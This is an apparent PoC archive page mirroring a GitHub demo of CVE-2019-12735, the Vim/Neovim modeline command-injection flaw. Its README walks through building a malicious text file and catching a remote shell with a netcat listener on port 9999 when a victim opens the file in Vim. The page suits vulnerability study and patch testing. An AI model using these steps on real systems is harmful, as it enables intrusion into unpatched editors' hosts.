Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-12735 PoC — Vim 操作系统命令注入漏洞

Source
https://github.com/st9007a/CVE-2019-12735
Associated Vulnerability
Title:Vim 操作系统命令注入漏洞 (CVE-2019-12735)
Description:getchar.c in Vim before 8.1.1365 and Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by execute in Vim, and assert_fails or nvim_input in Neovim.
Description
A demo for cve-2019-12735
Readme
# CVE-2019-12735

This CVE was fixed after neovim 0.3.6 and vim 8.1.1365

## POC

```bash
vim demo1.txt
```

## Remote shell

1. Create malware text file:

```bash
gcc make_demo3.c -o make_demo3
./make_demo3
```

2. Build client in another session:
```bash
nc -vlp 9999
```

3. Open malware file:
```bash
vim demo3.txt
```

And then, you can execute any linux commands in the session.


## Reference

- [A POC demo on github](https://github.com/pcy190/ace-vim-neovim)
- [Exploit DB](https://www.exploit-db.com/exploits/46973)
- [netcat](https://myapollo.com.tw/zh-tw/linux-command-nc/)

## ANSI

- `\x1b[?7l` : 輸出到行末時不換行, 持續覆蓋最後一個字元
- `\x1bS`: STS, Set transmit state
- `\x1b[1G`: 移動到column 1
- `\x1b[K`: 刪除從目前游標位置至行末的所有字元
File Snapshot

 [4.0K]  /data/pocs/51a8591d44f6bf8258e1505db50f1ea7d7684652
├── [  75]  demo1.txt
├── [ 141]  demo2.txt
├── [ 266]  Dockerfile
├── [ 564]  make_demo3.c
├── [  42]  modeline_demo.py
└── [ 801]  README.md

0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →